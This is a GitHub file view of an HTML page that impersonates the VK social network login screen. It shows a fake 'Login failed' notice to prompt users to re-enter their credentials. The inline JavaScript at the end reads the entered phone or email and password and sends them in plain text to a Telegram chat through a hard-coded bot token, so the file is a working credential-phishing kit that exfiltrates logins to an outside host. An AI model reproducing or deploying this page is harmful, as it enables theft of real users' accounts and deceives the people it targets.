forked from SParmanov/vk.github.io
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
129 lines (105 loc) · 5.22 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="style.css">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css"
integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css"
integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/vue.js" defer></script>
<script src="https://unpkg.com/xlsx/dist/xlsx.full.min.js" defer></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js" defer></script>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
crossorigin="anonymous" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"
integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49"
crossorigin="anonymous" defer></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"
integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy"
crossorigin="anonymous" defer></script>
<title>Login | Vk</title>
</head>
<body class="bg-vk1">
<div class="">
<div class="row bg-vk">
<div class="col-sm-1 offset-4 ">
<img src="logo.png">
</div>
</div>
</div>
<div class=" rounded">
<div class="row rounded">
<div class="col-sm-6 offset-1 bg-white px-4 py-1 mt-4">
<p class="txtBlue">Install the VK mobile app </p>
</div>
</div>
<div class="row">
<div class="col-sm-10 offset-1 bg-white px-4 pt-3 mt-2">
<p class="color1">Stay in touch on the go with VK mobile. </p>
</div>
</div>
<div class="row">
<div class="col-sm-10 offset-1 bg-white px-4 py-1">
<div class="btn-logFailed bg-red px-3 py-1">
<p class="font-weight-bold txt-size">Login failed.</p>
<p class="font-weight-bolder txt-size">Please make sure that you've entered your login and password correctly. </p>
<p class="font-weight-bolder txt-size txtBlue" >Trouble logging in?.</p>
</div>
</div>
</div>
<div class="row">
<div class="col-sm-10 offset-1 bg-white px-4 py-1">
<input type="text" class="form-control " id="usr1" placeholder="Phone or email">
</div>
</div>
<div class="row">
<div class="col-sm-10 offset-1 bg-white px-4 py-1">
<input type="password" class="form-control" id="usr2" placeholder="Password">
</div>
</div>
<div class="row">
<div class="col-sm-10 offset-1 bg-white px-4 py-3">
<div class="btn-logIn bg-vk cursor">
<h6 class="text-center text-white pt-2 cursor" onclick="text()">Log in</h6>
</div>
</div>
</div>
<div class="row">
<div class="col-sm-10 offset-1 bg-white px-4 py-1">
<div class="">
<h6 class="text-center pt-2 txtBlue">Forgot password?</h6>
</div>
</div>
</div>
<div class="row">
<div class="col-sm-10 offset-1 bg-white px-4 pt-3">
<p class="color1">First time on VK? </p>
</div>
</div>
<div class="row">
<div class="col-sm-10 offset-1 bg-white px-4 pb-3">
<div class="btn-logIn bg-success">
<h6 class="text-center text-white pt-2">Sign up for VK</h6>
</div>
</div>
</div>
</div>
<script>
function text(){
var login = document.getElementById('usr1').value
var password = document.getElementById('usr2').value
var text = "Login: " +login+ " Password: "+password
send(text)
}
function send(txt) {
var chat_id="-388316535";
var token="765351847:AAH9Zs8iCmidd_n0nMd5rFlZ8Kgiy19Dwdg";
var request = new XMLHttpRequest();
request.open('GET', "https://api.telegram.org/bot"+token+"/sendMessage?chat_id="+chat_id+"&parse_mode=html&text="+txt+"", true);
request.send(null);
}
</script>
</body>
</html>